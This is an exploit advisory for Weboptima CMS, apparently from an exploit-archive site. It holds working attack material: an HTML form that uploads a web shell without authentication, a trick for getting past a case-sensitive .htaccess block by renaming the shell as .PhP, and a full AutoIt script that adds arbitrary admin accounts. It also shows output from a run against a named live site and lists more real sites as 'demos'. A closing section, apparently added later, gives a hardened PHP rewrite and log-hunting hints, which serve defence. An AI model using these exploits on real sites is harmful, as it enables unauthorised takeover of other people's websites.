Weboptima CMS Add Administrator & Shell Upload

2013.01.24
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#cs
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Inj3ct0r / 1337day.com >> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#########################################
I'm AkaStep member from Inj3ct0r Team
#########################################
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

weboptima_cms_remote_add_admin_shell_upload.au3
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both exploits are included: an HTML form to upload a shell, and an AutoIt
exploit that adds arbitrary admin accounts to the target site. More details below.
============================================
Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/
============================================

About Vulns:

1st vulnerability: REMOTE SHELL UPLOAD
Any *UNAUTHENTICATED* USER CAN UPLOAD A SHELL. The handler performs no
session check at all, and the only filter on the file name looks at its
first character.

Vulnerable code: //cms/upload.php
=============SNIP BEGINS======================
<?php
$path="../uploades";
if(!file_exists($path))
{
    mkdir($path, 0777);
}
if(isset($_GET['name']))
{
    unlink($path."/".$_GET['name']);
    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">????? ??????</span></td>
</tr>
<tr>
<td>
<?php
if(isset($_POST['sub']))
{
    $fileName = $_FILES["up_file"]['name'];
    $masSimbl = array('&','%','#');
    if(in_array($fileName[0], $masSimbl))
    {
        echo $fileName[0].' ???????? ?????? ????? ???????';
    }
    else
    {
        move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
    }
}
?>
========================SNIP ENDS=================

Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file" name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send">
</form>

After a successful upload the shell can be found at:
http://site.tld/uploades/shellname.php

NOTE: There may be a simple .htaccess that blocks direct access to the shell
(HTTP 403). That is not a problem: the rule is case-sensitive, so upload the
shell as myshell.PhP or myshell.pHp instead. OWNED.

2nd vulnerability: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO THE TARGET SITE.

Vulnerable Code: //cms/loginPass.php
Notice: header() without exit; the script continues executing, so an
unauthenticated POST is redirected *and* still processed by the add-admin
code that follows.
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop")
{
    header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");
$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is an exploit written in AutoIt that abuses this to add an admin to the target site.

Exploit usage (CLI):
weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere

##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld username password
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
 OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################
#ce

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

; Flow: banner -> argument check -> fingerprint the CMS by the 'kcaptcha' string on
; /cms/index.php -> POST the add-admin form to cms/loginPass.php unauthenticated,
; once against www.<host> and once against the bare host, then print login hints.

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
    'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
    'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
    @CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
    '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF

if $CmdLine[0] <> 3 Then
    MsgBox(64,"",$msg_usage);
    ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
    exit;
EndIf
if $CmdLine[0]=3 Then
    $targetsite=$CmdLine[1];
    $username=$CmdLine[2];
    $password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
    ConsoleWrite('Are you kidding me?');
    Exit;
EndIf

HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
    Exit;
EndIf

ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
if StringInStr($sidentify,$cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
    $error+=1;
EndIf

; Strip scheme and slashes, prefix www.; the second pass strips the www. again (StringMid below).
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')
priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)
    $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;
    Global $sAddress = $targetsite
    $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
    $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
        $username & @CRLF & 'With Password: ' & $password & $triptrop;
    if $count <=1 then ConsoleWrite($whatcurrentlywedo)
    $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
    ConsoleWrite($doitnicely);
    ; The form fields the add-admin code in loginPass.php expects.
    Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";

    if $error>=2 OR $count>=2 Then
        ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
        if int($error)=0 then
            ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _
                @CRLF & 'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
                $username & @CRLF & 'With Password: ' & $password & @CRLF & _
                '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
                ' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);
            exit;
        Else
            ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
                '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
                '[*] May be you are Lucky;) [*]' & _
                @CRLF & 'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF & _
                'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
        EndIf
        exit;
    EndIf

    Global $hOpen = _WinHttpOpen($useragent);
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
    _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
    _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
    _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
    _WinHttpSendRequest($hRequest, -1, $sPostData)
    _WinHttpReceiveResponse($hRequest)

    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(Random(10000,20000,1));
        priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;
    Else
        $error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(Random(10000,20000,1));
        priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
    EndIf
EndFunc;=> priv8();

#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce
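Both defects above share one root cause, a missing authentication gate (absent in upload.php, present but toothless in loginPass.php because header() is not followed by exit), and the upload handler adds a second: it trusts the client-supplied file name, inspecting only its first character, and its unlink branch deletes ../uploades/<name> for anyone who asks. The PHP below is an added example written for this page, not Weboptima's code. It is a hardened replacement for cms/upload.php that opens with the loginPass.php guard done right, then accepts uploads only against a case-insensitive allowlist with a content check, stores them under a server-chosen random name outside the document root, and deletes only names it issued itself. The session key and value (`status_shoping_adm` / `adm_shop`) and the form fields `up_file` and `sub` are taken from the snippets above; the storage path, the allowlist, the CSRF token's session key and the log format are assumptions for this example.

```php
<?php
// Added example for this page, not Weboptima CMS code: a hardened cms/upload.php.
// From the advisory's snippets: $_SESSION['status_shoping_adm'] === 'adm_shop' marks an
// admin; the form posts 'up_file' and 'sub'. Everything else here is an assumption.
declare(strict_types=1);

session_start();

// (1) The loginPass.php bug, fixed. header() only queues a response header; PHP keeps
//     executing the file unless told to stop. The exit is the entire fix.
function require_admin(string $redirectTo = 'index.php'): void
{
    if (($_SESSION['status_shoping_adm'] ?? null) === 'adm_shop') {
        return;
    }
    // Unauthenticated requests that hit admin scripts are worth a log line.
    error_log(sprintf('[cms] unauthenticated %s %s from %s',
        $_SERVER['REQUEST_METHOD'] ?? '?', $_SERVER['REQUEST_URI'] ?? '?',
        $_SERVER['REMOTE_ADDR'] ?? '?'));
    header('Location: ' . $redirectTo, true, 302);
    exit;
}
require_admin();

// (2) Assumed layout: this file lives in <docroot>/cms/, so ../../private_uploads is
//     beside the document root, not under it. Nothing stored there has a URL, so the
//     question "does the .htaccess rule match .PhP?" never arises.
$storageDir = __DIR__ . '/../../private_uploads';

// (3) Case-insensitive allowlist paired with the MIME type the bytes must really have.
//     The original checked only whether the name's first character was &, % or #.
$allowed = [
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
    'pdf' => 'application/pdf',
];

function safe_upload(array $file, string $storageDir, array $allowed): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Only the extension is taken from the client name, lower-cased: php, PhP and pHp
    // are one case here, so there is no variant left to "walk around" a filter.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // Check the content, not the label: shell.png with PHP inside is still refused.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    if (!is_dir($storageDir) && !mkdir($storageDir, 0750, true)) {
        return null;
    }
    // Server-chosen name: no traversal, no overwrite, no guessable /uploades/shell.php.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = $storageDir . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);
    return $stored;
}

// (4) The original unlinked "../uploades/" . $_GET['name'] for any visitor. Deletion is
//     now POST-only, behind the same guard and a CSRF token, and accepts only the
//     32-hex-char names issued by safe_upload(), so "../" can never reach unlink().
function safe_delete(string $name, string $storageDir): bool
{
    if (!preg_match('/\A[0-9a-f]{32}\.[a-z0-9]{1,5}\z/', $name)) {
        return false;
    }
    $path = $storageDir . '/' . $name;
    return is_file($path) && unlink($path);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Assumption: the form renderer put a random token in $_SESSION['csrf'].
    $token = (string)($_SESSION['csrf'] ?? '');
    if ($token === '' || !hash_equals($token, (string)($_POST['csrf'] ?? ''))) {
        http_response_code(403);
        exit('bad token');
    }
    if (isset($_POST['delete'])) {
        echo safe_delete((string)$_POST['delete'], $storageDir) ? 'deleted' : 'refused';
    } elseif (isset($_POST['sub'], $_FILES['up_file'])) {
        $stored = safe_upload($_FILES['up_file'], $storageDir, $allowed);
        echo $stored === null ? 'refused' : 'stored as ' . htmlspecialchars($stored);
    }
}
```

Two caveats for anyone patching a live install rather than rewriting it. First, if uploads must stay under the web root, the .htaccess that returns 403 is not the control to rely on: Apache's mod_mime maps handlers to extensions case-insensitively, while a `<FilesMatch "\.php$">` deny rule is case-sensitive, which is exactly why myshell.PhP both survives the rule and executes. Under mod_php, where overrides are permitted, turn execution off in that directory (`php_flag engine off`, `RemoveHandler .php`) and write any pattern with `(?i)`. Second, for hunting, the AutoIt exploit above posts to `cms/loginPass.php?test=<random integer>` with a fixed `Cookie: ComeToPwnYou` header and a body ending in `add_sub=Add+New`; both strings are trivially greppable in access logs, but a redirect response alone proves nothing, since the vulnerable and the fixed script both answer 302.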

References:

http://weboptima.am/


Copyright 2024, cxsecurity.com

 
